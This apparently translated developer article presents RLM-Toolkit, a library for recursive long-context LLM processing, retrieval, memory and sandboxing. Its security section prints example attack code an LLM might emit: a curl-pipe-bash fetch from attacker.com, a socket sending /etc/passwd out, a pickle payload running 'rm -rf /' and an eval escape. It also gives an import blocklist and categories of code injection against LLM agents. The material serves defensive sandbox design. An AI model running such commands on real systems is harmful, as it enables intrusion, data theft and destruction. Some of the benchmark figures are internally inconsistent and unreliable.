From theory to production: architecture, algorithms, security
Hello, Habr!
This is a comprehensive guide to RLM-Toolkit, an open-source library for working with contexts of arbitrary length.
What I'll cover:
Formal theory of RLM (state machine, recursion)
InfiniRetri: the math of attention-based retrieval
H-MEM: a cognitive memory architecture
RAG vs KAG vs GraphRAG vs InfiniRetri
Security: CIRCLE compliance, sandbox escape prevention
Real examples with execution logs
Troubleshooting and best practices
Level: from mid-level engineers to PhD-level research.
v1.0.1 was released yesterday and already has 200+ unique downloads in less than a day!
pip install rlm-toolkit
On the roadmap: integration with NVIDIA KVzap for hardware-accelerated KV-cache compression.
| Model | Context | Effective | Decay λ | Source |
|---|---|---|---|---|
| GPT-4o | 128K | ~80K | 0.012 | OpenAI |
| GPT-OSS-120B | 128K | ~100K | 0.010 | OpenAI |
| Claude Sonnet 4.5 | 200K | ~150K | 0.010 | Anthropic |
| Claude Opus 4.5 | 200K | ~180K | 0.008 | Anthropic |
| Gemini 3 Pro | 2M | ~1.5M | 0.003 | Google |
| Gemini 3 Flash | 1M | ~800K | 0.004 | Google |
| Llama 4 Scout | 10M | ~8M | 0.001 | Meta |
| Qwen3-235B | 128K | ~100K | 0.011 | Alibaba |
Quality(c) = Q₀ × e^(-λc) + ε
where:
Q₀ = baseline model quality (as c → 0)
λ = decay coefficient (model-specific)
c = context length in tokens
ε = noise (hallucination baseline)
Why exponential? Attention in transformers scales as O(n²) in sequence length. As the context grows:
Attention weights are spread across more tokens
Important information "drowns" in the mass
Positional encoding loses precision at distant positions
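To get a feel for the decay model Quality(c) = Q₀ × e^(-λc) + ε, here is a minimal Python sketch. It rests on an assumption that the article does not state: that λ from the table is expressed per thousand tokens, so `context_k_tokens` is the context length in thousands of tokens. The function name and the default values are illustrative only.

```python
import math

def quality(context_k_tokens, q0=1.0, decay=0.012, noise=0.0):
    """Quality(c) = Q0 * exp(-lambda * c) + epsilon.

    Assumption: c is measured in thousands of tokens (the unit of
    lambda is not given in the text, so this is a guess).
    """
    return q0 * math.exp(-decay * context_k_tokens) + noise

# Compare a short and a long context for the same hypothetical model
for c in (8, 32, 128):
    print(f"{c}K tokens -> quality {quality(c):.3f}")
```

The only point of the sketch is the shape of the curve: quality falls monotonically with context length and flattens out at the noise floor ε.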
Tests on OOLONG-Pairs (arxiv:2512.24601):
| Context | NIAH (simple) | OOLONG-Pairs (hard) |
|---|---|---|
| 8K | 98% | 72% |
| 32K | 97% | 58% |
| 128K | 95% | 31% |
| 512K | 91% | 8% |
| 1M | 89% | <0.1% |
OOLONG-Pairs is a task of comparing pairs of entities scattered across a document. It requires global understanding rather than local search.
Chunking:
chunks = split(document, size=100_000)
results = [llm.analyze(chunk) for chunk in chunks]
final = merge(results)
# ❌ PROBLEM: cross-chunk references are lost
# If fact A is in chunk 1 and fact B is in chunk 5, the link is never found
Summarization:
summary = llm.summarize(document)  # 10M → 10K
answer = llm.query(summary, question)
# ❌ PROBLEM: details are lost irreversibly
# "The contract has 847 clauses" → "A detailed contract"
RAG:
relevant = vectordb.search(query, k=10)
answer = llm.generate(query, relevant)
# ❌ PROBLEM: semantic similarity ≠ relevance
# "Find contradictions": which embedding should you search for?
"Long prompts should not be fed into the neural network directly. They should be part of the environment that the LLM interacts with symbolically."
— Zhang, Kraska, Khattab (arxiv:2512.24601)
┌────────────────────────────────────────────────────────────────┐
│ RLM ARCHITECTURE │
├────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ INPUT LAYER │ │
│ │ context = "10M tokens..." query = "Find bugs" │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ REPL ENVIRONMENT (Python) │ │
│ │ Variables: {context, vars, history} │ │
│ │ Functions: {llm_query, FINAL, FINAL_VAR} │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ ROOT LLM (Controller) │ │
│ │ Generates Python code to analyze context │ │
│ │ Makes decisions about sub-calls │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ ↓ │
│ ┌─────────────────┐ ┌─────────────────────────┐ │
│ │ CODE EXECUTOR │ │ SUB-LLM CALLS │ │
│ │ (Sandboxed) │ │ llm_query(prompt) │ │
│ │ AST validation │ │ depth++, budget-- │ │
│ └─────────────────┘ └─────────────────────────┘ │
│ ↓ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ STATE UPDATE │ │
│ │ vars.update(new_vars) │ │
│ │ history.append(output) │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ FINAL(answer) → OUTPUT │
│ │
└────────────────────────────────────────────────────────────────┘
Definition 1. A Recursive Language Model (RLM) is a tuple (L, E, R, S, δ, F), where:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float)
Actions:
- CODE(c) : Execute code c, update vars
- QUERY(p) : Call sub-LLM with prompt p, depth++
- FINAL(x) : Terminate with output x
- FINAL_VAR(v): Terminate with vars[v]
Transitions:
S₀ = (P, {}, [], 0, 0.0) # Initial state
δ(S, CODE(c)):
    output = execute(c, S.vars)
    return S with {
        vars = S.vars ∪ new_vars(output),
        history = S.history + [output]
    }
δ(S, QUERY(p)):
    result = sub_llm.generate(p)
    return S with {
        vars = S.vars ∪ {"last_query": result},
        history = S.history + [result],
        depth = S.depth + 1,
        cost = S.cost + query_cost(p, result)
    }
δ(S, FINAL(x)):
    HALT with output x
Context Never Loaded: context exists as a variable but is never fed to the LLM in full
Depth Bounded: depth ≤ max_depth (typically 2-3)
Cost Bounded: cost ≤ max_cost (budget in USD)
Termination Guaranteed: either FINAL or max_iterations
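The state machine and its four invariants can be sketched as a small driver loop. This is an illustrative toy, not the RLM-Toolkit implementation: `run_rlm`, `State`, `BudgetExceeded`, the `(kind, payload)` action encoding, and the flat `cost_per_query` are all hypothetical names and simplifications. In particular, a CODE action here carries a plain Python callable instead of sandboxed source code.

```python
from dataclasses import dataclass, field

@dataclass
class State:
    context: str                      # never passed to the LLM as a whole
    vars: dict = field(default_factory=dict)
    history: list = field(default_factory=list)
    depth: int = 0
    cost: float = 0.0

class BudgetExceeded(RuntimeError):
    """Raised when a QUERY would violate the depth or cost bound."""

def run_rlm(policy, sub_llm, context, max_iterations=10, max_depth=3,
            max_cost=1.0, cost_per_query=0.01):
    """Apply actions chosen by `policy` until FINAL or max_iterations."""
    state = State(context=context)
    for _ in range(max_iterations):
        kind, payload = policy(state)
        if kind == "FINAL":
            return payload
        if kind == "FINAL_VAR":
            return state.vars[payload]
        if kind == "CODE":
            # payload stands in for sandboxed code: state -> (output, new_vars)
            output, new_vars = payload(state)
            state.vars.update(new_vars)
            state.history.append(output)
        elif kind == "QUERY":
            if state.depth >= max_depth or state.cost + cost_per_query > max_cost:
                raise BudgetExceeded("depth or cost bound reached")
            result = sub_llm(payload)
            state.vars["last_query"] = result
            state.history.append(result)
            state.depth += 1
            state.cost += cost_per_query
        else:
            raise ValueError(f"unknown action: {kind}")
    return None  # max_iterations reached without FINAL
```

The loop terminates either through FINAL/FINAL_VAR or after `max_iterations` steps, and every QUERY is checked against the depth and cost bounds before the sub-model is called.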
# Query: "Find all SQL injections in the code"
# Iteration 1: Root LLM generates code
"""
sections = context.split("\\n\\n# FILE:")
print(f"Found {len(sections)} files")
sql_patterns = ["execute(", "cursor.execute", "raw("]
suspicious = []
for i, section in enumerate(sections):
    if any(p in section for p in sql_patterns):
        suspicious.append(i)
print(f"Suspicious files: {suspicious}")
"""
# Output: "Found 47 files\nSuspicious files: [3, 12, 29, 45]"
# Iteration 2: Deep analysis via sub-LLM
"""
for idx in suspicious[:3]:  # Analyze first 3
    file_content = sections[idx][:8000]  # Truncate for sub-call
    analysis = llm_query(f'''
    Analyze this code for SQL injection vulnerabilities:
    {file_content}
    ''')
    print(f"File {idx}: {analysis}")
"""
# Output: "File 3: VULNERABLE - unsanitized user input at line 42..."
# Iteration 3: Compile results
"""
vulnerabilities = [
    {"file": 3, "line": 42, "type": "SQL Injection"},
    {"file": 12, "line": 87, "type": "SQL Injection"},
    # ...
]
FINAL_VAR(vulnerabilities)
"""
Query: "Find all mentions of the deadline"
Vector Search:
1. Embed query → q_vec
2. For each chunk: similarity(q_vec, chunk_vec)
3. Return top-k
PROBLEM: the "deadline" may be phrased as:
- "due date"
- "by January 15"
- "no later than the first quarter"
Vector similarity alone often fails to connect such indirect phrasings!
Use the LLM's internal attention weights as a relevance signal.
The LLM already "knows" which tokens to attend to when answering a question. We simply extract that information.
def infiniretri(context: str, question: str, model: LLM) -> str:
    """
    Attention-Based Infinite Context Retrieval
    Based on arxiv:2502.12962
    """
    # Step 1: Chunk context into segments
    segments = chunk(context, size=SEGMENT_SIZE)  # e.g., 8K tokens each
    # Step 2: Initialize historical context
    historical_context = ""
    # Step 3: Iterative processing (like human reading)
    for segment in segments:
        # Combine historical context + current segment
        combined = historical_context + segment
        # Run model with question to get attention
        output, attention_weights = model.forward_with_attention(
            prompt=f"Context: {combined}\n\nQuestion: {question}"
        )
        # Step 4: Attention-based retrieval
        # Average attention across layers and heads
        avg_attention = attention_weights.mean(dim=[0, 1])
        # Find tokens with highest attention
        top_indices = avg_attention.topk(k=TOP_K).indices
        # Step 5: Update historical context
        # Keep only high-attention tokens from combined
        # NOTE: pseudocode. top_indices are token positions in the prompt,
        # so a real implementation must map them back to spans of `combined`.
        relevant_tokens = [combined[i] for i in top_indices]
        historical_context = "".join(relevant_tokens)
    # Step 6: Final answer with preserved context
    return model.generate(
        f"Context: {historical_context}\n\nQuestion: {question}\n\nAnswer:"
    )
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h}
where:
L = number of layers
H = number of heads per layer
A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Tokens with a high importance score are kept in the historical context.
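The two formulas above can be sketched in plain Python. This is a minimal illustration rather than the library's code: the function names are hypothetical, and the attention tensor is assumed to be a nested list indexed as `attn[layer][head][query][token]`.

```python
def aggregate_attention(attn):
    """A_final[q][t]: mean of attn[l][h][q][t] over all layers and heads."""
    n_layers, n_heads = len(attn), len(attn[0])
    n_q, n_t = len(attn[0][0]), len(attn[0][0][0])
    a_final = [[0.0] * n_t for _ in range(n_q)]
    for layer in attn:
        for head in layer:
            for q in range(n_q):
                for t in range(n_t):
                    a_final[q][t] += head[q][t]
    scale = 1.0 / (n_layers * n_heads)
    return [[value * scale for value in row] for row in a_final]

def token_importance(a_final, query_positions):
    """importance(t) = sum of A_final[q][t] over the question's positions q."""
    n_t = len(a_final[0])
    return [sum(a_final[q][t] for q in query_positions) for t in range(n_t)]

def top_k_tokens(importance, k):
    """Positions of the k most important tokens, in document order."""
    ranked = sorted(range(len(importance)),
                    key=lambda t: importance[t], reverse=True)
    return sorted(ranked[:k])
```

Returning the selected positions in document order keeps the retained text readable when it is stitched back into the historical context.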
| Benchmark | Baseline LLM | + RAG | + InfiniRetri |
|---|---|---|---|
| NIAH @1M | 23% | 61% | 100% |
| LongBench | 31% | 51% | 89% (+288%) |
| SCROLLS | 44% | 58% | 82% |
| QuALITY | 29% | 47% | 71% |
from rlm_toolkit.retrieval import InfiniRetriever
# Initialize with small model for efficiency (default: Qwen2.5-0.5B)
retriever = InfiniRetriever(
model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct",
)
# Load massive document
with open("codebase_1m_tokens.txt", encoding="utf-8") as f:
    huge_doc = f.read()
# Retrieve the answer
answer = retriever.retrieve(
    context=huge_doc,
    question="In which function is SecurityEngine defined?"
)
print(answer)
# Output: "SecurityEngine is defined in engines/base.py,
# in the create_engine() function at line 142"
| Aspect | RAG | KAG | GraphRAG | InfiniRetri |
|---|---|---|---|---|
| Approach | Vector similarity | Knowledge Graph | Community detection | Attention-based |
| Indexing | Embedding + VectorDB | Entity extraction + Graph | Summarization + Leiden | None (runtime) |
| Indexing time | Minutes | Hours | Hours | 0 |
| Requirements | Embedding model | Graph DB + LLM | LLM + lots of $$ | Attention access |
| Global context | ❌ | ✅ | ✅ | ✅ |
| Exact retrieval | ~70% | ~85% | ~80% | 100% |
| Cost | $ | $$$ | $$$$ | $ |
| Open Source | ✅ | ✅ | ✅ | ✅ |
┌─────────────────────────────────────────────────────────────────┐
│                          DECISION TREE                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Context < 50K tokens?                                          │
│  └─ YES → Standard RAG (cheap, simple)                          │
│  └─ NO ↓                                                        │
│                                                                 │
│  Need structured relationships?                                 │
│  └─ YES → KAG (medicine, law, finance)                          │
│  └─ NO ↓                                                        │
│                                                                 │
│  Need a global overview of a large corpus?                      │
│  └─ YES → GraphRAG (research, due diligence)                    │
│  └─ NO ↓                                                        │
│                                                                 │
│  Is retrieval accuracy critical?                                │
│  └─ YES → InfiniRetri (code, legal, security)                   │
│  └─ NO ↓                                                        │
│                                                                 │
│  Context > 500K tokens?                                         │
│  └─ YES → RLM + InfiniRetri                                     │
│  └─ NO → RAG is sufficient                                      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever
hybrid = HybridRetriever(
    retrievers=[
        VectorRetriever(model="BAAI/bge-m3", weight=0.3),
        InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7),
    ],
    fusion="reciprocal_rank"  # RRF fusion
)
# Fast vector pre-filter + precise attention refinement
results = hybrid.retrieve(context, question)
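For readers unfamiliar with reciprocal rank fusion, here is a minimal weighted RRF sketch. It is not taken from RLM-Toolkit: the function name is hypothetical, and the smoothing constant `k=60` is the value commonly used with RRF rather than something the article specifies. Each retriever contributes `weight / (k + rank)` for every item it returns.

```python
def reciprocal_rank_fusion(rankings, weights=None, k=60):
    """Fuse several ranked lists into one.

    rankings: list of lists, each ordered from best to worst.
    weights:  optional per-ranking weights (defaults to 1.0 each).
    """
    if weights is None:
        weights = [1.0] * len(rankings)
    scores = {}
    for ranking, weight in zip(rankings, weights):
        for rank, item in enumerate(ranking, start=1):
            scores[item] = scores.get(item, 0.0) + weight / (k + rank)
    # Highest fused score first; ties broken by item for determinism
    return sorted(scores, key=lambda item: (-scores[item], item))

vector_hits = ["a", "b", "c"]       # hypothetical vector-search ranking
attention_hits = ["b", "c", "a"]    # hypothetical attention-based ranking
print(reciprocal_rank_fusion([vector_hits, attention_hits], weights=[0.3, 0.7]))
```

Because RRF works on ranks rather than raw scores, the two retrievers do not need comparable score scales, which is the usual reason to prefer it for hybrid setups.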
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever
# Step 1: KAG finds relevant entities
kag = KAGRetriever(graph_db="neo4j://localhost:7687")
entities = kag.query("All contracts with Gazprom")
# Step 2: InfiniRetri finds exact mentions
infini = InfiniRetriever("Qwen/Qwen3-0.6B")
for entity in entities:
    details = infini.retrieve(
        context=full_document,
        question=f"Details about {entity.name}"
    )
| Method | Indexing | Query | Total (100 queries) |
|---|---|---|---|
| RAG (OpenAI) | $0.13 | $0.02 | $2.13 |
| KAG (GPT-4o) | $15.00 | $0.50 | $65.00 |
| GraphRAG | $50.00 | $0.10 | $60.00 |
| InfiniRetri | $0.00 | $0.05 | $5.00 |
| RLM + InfiniRetri | $0.00 | $0.30 | $30.00 |
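The "Total" column follows from a simple formula: one-off indexing cost plus per-query cost times the number of queries. A short sketch using the figures from the table (the helper names are hypothetical):

```python
def total_cost(indexing_usd, per_query_usd, n_queries):
    """One-off indexing cost plus per-query cost, rounded to cents."""
    return round(indexing_usd + per_query_usd * n_queries, 2)

def break_even_queries(index_a, query_a, index_b, query_b):
    """Query count at which methods A and B cost the same (None if never)."""
    if query_a == query_b:
        return None
    n = (index_b - index_a) / (query_a - query_b)
    return n if n > 0 else None

print(total_cost(0.13, 0.02, 100))    # RAG (OpenAI) row
print(total_cost(15.00, 0.50, 100))   # KAG (GPT-4o) row
# InfiniRetri (no index, $0.05/query) vs RAG ($0.13 index, $0.02/query)
print(break_even_queries(0.00, 0.05, 0.13, 0.02))
```

With these numbers InfiniRetri is cheaper than RAG only for the first handful of queries, while RAG's small indexing cost pays off quickly as query volume grows.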
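# Simplified sketch of a token-limited buffer memory (LangChain-style)
def token_count(messages):
    # Crude proxy: whitespace-separated words stand in for tokens
    return sum(len(m.split()) for m in messages)
class BufferMemory:
    def __init__(self, max_tokens=4000):
        self.buffer = []
        self.max_tokens = max_tokens
    def add(self, message):
        self.buffer.append(message)
        # FIFO eviction
        while token_count(self.buffer) > self.max_tokens:
            self.buffer.pop(0)  # ❌ Old messages are lost for good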
Problems:
FIFO eviction: important old content is evicted before unimportant new content
No abstraction: "we discussed Python yesterday" and the fine details live at the same level
No links: conversations are isolated
H-MEM is based on Complementary Learning Systems (CLS) theory:
HIPPOCAMPUS (fast memorization)
↓ consolidation
NEOCORTEX (long-term storage, abstractions)
The four H-MEM levels:
┌─────────────────────────────────────────────────────────────────┐
│  LEVEL 3: DOMAIN                                                │
│  "User is a developer interested in AI Security"                │
│  Changes very rarely, high abstraction                          │
├─────────────────────────────────────────────────────────────────┤
│  LEVEL 2: CATEGORY                                              │
│  "Topic: weather", "Topic: code", "Topic: documentation"        │
│  Semantic clusters                                              │
├─────────────────────────────────────────────────────────────────┤
│  LEVEL 1: TRACE                                                 │
│  "Discussed Moscow and St. Petersburg weather, prefers +20°C"   │
│  Consolidated memories                                          │
├─────────────────────────────────────────────────────────────────┤
│  LEVEL 0: EPISODE                                               │
│  "User: what's the weather?" "AI: +15°C, cloudy"                │
│  Raw interactions                                               │
└─────────────────────────────────────────────────────────────────┘
# Assumed source of the clustering classes (HDBSCAN needs scikit-learn >= 1.3)
from sklearn.cluster import HDBSCAN, KMeans
class HierarchicalMemory:
    def consolidate(self):
        """
        Memory consolidation: Episodes → Traces → Categories → Domains
        """
        # Step 1: Cluster episodes by semantic similarity
        episode_embeddings = self.embed(self.episodes)
        clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings)
        # Step 2: Create traces via LLM summarization
        for cluster_id in set(clusters.labels_):
            if cluster_id == -1:  # Noise
                continue
            cluster_episodes = [
                self.episodes[i]
                for i, c in enumerate(clusters.labels_)
                if c == cluster_id
            ]
            trace = self.llm.summarize(
                f"Summarize these interactions:\n{cluster_episodes}"
            )
            self.traces.append(Trace(
                content=trace,
                source_episodes=cluster_episodes,
                timestamp=now()
            ))
        # Step 3: Cluster traces → categories
        if len(self.traces) >= 5:
            trace_embeddings = self.embed([t.content for t in self.traces])
            # The model must be fitted before labels_ is available
            trace_clusters = KMeans(
                n_clusters=min(5, len(self.traces)//3)
            ).fit(trace_embeddings)
            for cluster_id in range(trace_clusters.n_clusters):
                cluster_traces = [
                    self.traces[i]
                    for i, c in enumerate(trace_clusters.labels_)
                    if c == cluster_id
                ]
                category = self.llm.summarize(
                    f"What category do these belong to?\n{cluster_traces}"
                )
                self.categories.append(Category(content=category))
        # Step 4: Update domain (rarely)
        if len(self.categories) >= 3 and self._should_update_domain():
            self.domain = self.llm.generate(
                f"Based on categories {self.categories}, "
                f"describe the user's overall interests and profile."
            )
What if new information contradicts old information?
def add_episode_with_conflict_check(self, new_episode: str):
    """
    Check for conflicts and update memories accordingly.
    """
    # Find potentially conflicting memories
    similar = self.retrieve(new_episode, k=5)
    for memory in similar:
        conflict = self.llm.check_conflict(
            f"Old: {memory.content}\nNew: {new_episode}"
        )
        if conflict.is_conflict:
            if conflict.new_supersedes:
                # Update old memory
                memory.content = self.llm.merge(
                    f"Update '{memory.content}' with '{new_episode}'"
                )
                memory.updated_at = now()
            else:
                # Flag for human review
                self.conflicts.append(Conflict(old=memory, new=new_episode))
    self.episodes.append(Episode(content=new_episode))
import os
from rlm_toolkit.memory import SecureHierarchicalMemory
from rlm_toolkit.crypto import AES256GCM
# Create encrypted memory with trust zones
smem = SecureHierarchicalMemory(
    agent_id="agent-financial",
    trust_zone="confidential",
    encryption=AES256GCM(key=os.environ["HMEM_KEY"]),
)
# Add sensitive data (encrypted at rest)
smem.add_episode("Client SSN: 123-45-6789")  # Encrypted!
# Other agents cannot access
other_agent = SecureHierarchicalMemory(agent_id="agent-public")
try:
    other_agent.retrieve("SSN")  # ❌ AccessDenied
except AccessDenied:
    pass
# Grant explicit access
smem.grant_access("agent-compliance", "confidential")
compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance")
compliance_agent.retrieve("SSN")  # ✅ Works
The LLM generates tasks for itself → solves them → improves. No labeled data, no human feedback.
Based on:
R-Zero (arxiv:2508.05004): Challenger-Solver co-evolution
REBASE (arxiv:2512.29379): experience replay with scoring
┌─────────────────────────────────────────────────────────────────┐
│ R-ZERO LOOP │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌───────────────┐ ┌───────────────┐ │
│ │ CHALLENGER │ ──────→ │ SOLVER │ │
│ │ Generates │ │ Attempts │ │
│ │ hard tasks │ │ to solve │ │
│ └───────────────┘ └───────────────┘ │
│ ↑ │ │
│ │ ↓ │
│ │ ┌───────────────┐ │
│ │ │ VERIFIER │ │
│ │ │ Checks if │ │
│ │ │ correct │ │
│ │ └───────────────┘ │
│ │ │ │
│ │ ┌─────────────┴─────────────┐ │
│ │ ↓ ↓ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ CORRECT │ │ WRONG │ │
│ │ │ +reward │ │ -reward │ │
│ │ └──────────┘ └──────────┘ │
│ │ │ │ │
│ │ └───────────┬───────────────┘ │
│ │ ↓ │
│ │ ┌─────────────────┐ │
│ └───────────── │ EVOLUTION POOL │ │
│ │ Best strategies │ │
│ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy
from rlm_toolkit.providers import OllamaProvider
# Initialize
evolve = SelfEvolvingRLM(
    provider=OllamaProvider("llama4-scout:17b"),
    strategy=EvolutionStrategy.CHALLENGER_SOLVER,
    config={
        "challenge_diversity": 0.8,  # How different each challenge is
        "difficulty_ramp": 0.1,      # How fast difficulty increases
        "memory_size": 1000,         # Experience buffer size
    }
)
# Single solve with self-refinement
answer = evolve.solve("Prove that √2 is irrational")
print(f"Answer: {answer.answer}")
print(f"Confidence: {answer.confidence}")
print(f"Iterations: {answer.iterations}")
# Training loop (improves over time)
metrics = evolve.training_loop(
    iterations=100,
    domain="math",
    difficulty="hard",
    save_checkpoint=True,
)
print(f"Initial success rate: {metrics.initial_rate}")  # e.g., 65%
print(f"Final success rate: {metrics.final_rate}")      # e.g., 89%
print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE
rebase = REBASE(
    provider=OllamaProvider("llama4-scout:109b"),
    scorer="outcome",  # Score by final outcome
)
# Collect experiences
for task in tasks:
    trajectory = rebase.solve_with_trajectory(task)
    rebase.add_experience(trajectory)
# Train on best experiences
improved = rebase.train(
    epochs=10,
    batch_size=32,
    top_k_ratio=0.2,  # Use top 20% trajectories
)
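The `top_k_ratio=0.2` setting suggests that only the best-scoring fraction of collected trajectories is used for training. A minimal sketch of such a selection step, assuming each trajectory is a dict with a numeric `score` field (both the helper name and the data shape are hypothetical, not the REBASE API):

```python
import math

def select_top_trajectories(trajectories, top_k_ratio=0.2):
    """Keep the highest-scoring fraction of trajectories (at least one)."""
    if not 0 < top_k_ratio <= 1:
        raise ValueError("top_k_ratio must be in (0, 1]")
    if not trajectories:
        return []
    # round() guards against float artifacts such as 3.0000000000000004
    keep = max(1, math.ceil(round(len(trajectories) * top_k_ratio, 9)))
    ranked = sorted(trajectories, key=lambda t: t["score"], reverse=True)
    return ranked[:keep]

experiences = [{"task": f"task-{i}", "score": i / 10} for i in range(10)]
best = select_top_trajectories(experiences, top_k_ratio=0.2)
print([t["task"] for t in best])
```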
# The LLM may generate:
# 1. RCE via subprocess
import subprocess
subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"])
# 2. Data exfiltration via network
import socket
s = socket.socket()
s.connect(("attacker.com", 4444))
s.send(open("/etc/passwd").read().encode())
# 3. Pickle RCE
import pickle
class Exploit:
    def __reduce__(self):
        return (os.system, ("rm -rf /",))
pickle.loads(pickle.dumps(Exploit()))
# 4. Builtins escape
eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
It tests 7 attack categories:
Direct code injection
Obfuscated code injection
Indirect injection via context
Memory corruption attempts
Privilege escalation
Data exfiltration
Denial of service
┌─────────────────────────────────────────────────────────────────┐
│ SECURITY LAYERS │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Layer 1: AST STATIC ANALYSIS │
│ ───────────────────────────── │
│ Before execution, parse code to AST and check: │
│ - Import statements against blocklist │
│ - Function calls against dangerous patterns │
│ - Attribute access (__builtins__, __globals__) │
│ │
│ Layer 2: IMPORT BLOCKLIST (38 modules) │
│ ───────────────────────────────────── │
│ os, sys, subprocess, shutil, pathlib, │
│ socket, http, urllib, ftplib, telnetlib, requests, │
│ pickle, shelve, dill, cloudpickle, marshal, │
│ ctypes, cffi, multiprocessing, threading, │
│ code, codeop, pty, tty, termios, │
│ tempfile, glob, fnmatch, webbrowser, platform, │
│ asyncio (subprocess), importlib, builtins │
│ │
│ Layer 3: SANDBOXED EXECUTION │
│ ───────────────────────────── │
│ - Restricted builtins (no eval, exec, compile, open) │
│ - Timeout enforcement (default 30s) │
│ - Memory limit (default 512MB) │
│ - Virtual filesystem with quotas │
│ │
│ Layer 4: OUTPUT SANITIZATION │
│ ───────────────────────────── │
│ - Truncate output to prevent context overflow │
│ - Scan for sensitive data patterns (API keys, passwords) │
│ - Redact before returning to user │
│ │
└─────────────────────────────────────────────────────────────────┘
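Layer 1 can be illustrated with Python's standard `ast` module. The sketch below is a simplified stand-in, not the RLM-Toolkit validator: the function name is hypothetical and the blocklists are a small subset chosen for the example. It parses the generated code without executing it and reports blocked imports, dangerous calls, and access to sensitive dunder attributes.

```python
import ast

# Illustrative subsets only; the real blocklist in the article is longer
BLOCKED_MODULES = {"os", "sys", "subprocess", "socket", "pickle",
                   "ctypes", "importlib", "builtins"}
BLOCKED_CALLS = {"eval", "exec", "compile", "open", "__import__"}
BLOCKED_ATTRS = {"__builtins__", "__globals__", "__subclasses__", "__class__"}

def find_violations(source: str) -> list:
    """Return human-readable policy violations found in `source`."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]
    violations = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in BLOCKED_MODULES:
                    violations.append(f"import {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in BLOCKED_MODULES:
                violations.append(f"from {node.module} import ...")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                violations.append(f"call {node.func.id}()")
        elif isinstance(node, ast.Attribute) and node.attr in BLOCKED_ATTRS:
            violations.append(f"attribute .{node.attr}")
        elif isinstance(node, ast.Name) and node.id in BLOCKED_ATTRS:
            violations.append(f"name {node.id}")
    return violations

print(find_violations("import subprocess\nsubprocess.run(['ls'])"))
print(find_violations("total = sum(range(10))"))
```

Static checks like this are easy to evade on their own (for example through string building or aliasing), which is why the article pairs them with restricted builtins and a sandboxed runtime in the later layers.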
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
# Maximum security configuration
config = RLMConfig(
    security=SecurityConfig(
        sandbox=True,
        max_execution_time=30.0,
        max_memory_mb=512,
        blocked_imports="strict",  # All 38 modules
        allow_network=False,
        allow_filesystem=False,
        virtual_fs_quota_mb=100,
        redact_sensitive=True,
        sensitive_patterns=[
            r"[A-Za-z0-9]{32}",      # API keys
            r"password\s*[:=]",      # Passwords
            r"\d{3}-\d{2}-\d{4}",    # SSN
        ],
    )
)
rlm = RLM.from_ollama("llama4-scout:17b", config=config)
# The untrusted document is now processed inside the sandbox
result = rlm.run(untrusted_document, "Analyze this")
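To show what output redaction with such patterns might look like, here is a small sketch built on Python's `re` module. It is an illustration, not the library's redaction code: the function name and the `[REDACTED]` placeholder are assumptions, and the patterns are tightened variants of the ones in the config above (word boundaries added, and the password pattern extended to capture the value as well).

```python
import re

# Adapted from the config above; the exact forms are an assumption
SENSITIVE_PATTERNS = [
    r"\b[A-Za-z0-9]{32}\b",        # 32-character API-key-like tokens
    r"password\s*[:=]\s*\S+",      # "password = value" pairs
    r"\b\d{3}-\d{2}-\d{4}\b",      # US SSN format
]

def redact(text, patterns=SENSITIVE_PATTERNS, placeholder="[REDACTED]"):
    """Replace every match of every pattern with the placeholder."""
    for pattern in patterns:
        text = re.sub(pattern, placeholder, text, flags=re.IGNORECASE)
    return text

print(redact("Client SSN: 123-45-6789, password = hunter2"))
```

Note that the bare pattern `password\s*[:=]` from the config would match only the label, not the secret that follows it, which is why the sketch extends it with `\s*\S+`.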
================================ test session starts ================================
collected 27 items
tests/security/test_blocked_imports.py::test_os_blocked PASSED
tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED
tests/security/test_blocked_imports.py::test_socket_blocked PASSED
tests/security/test_blocked_imports.py::test_pickle_blocked PASSED
tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED
tests/security/test_sandbox.py::test_timeout_enforcement PASSED
tests/security/test_sandbox.py::test_memory_limit PASSED
tests/security/test_sandbox.py::test_builtins_restricted PASSED
tests/security/test_sandbox.py::test_eval_blocked PASSED
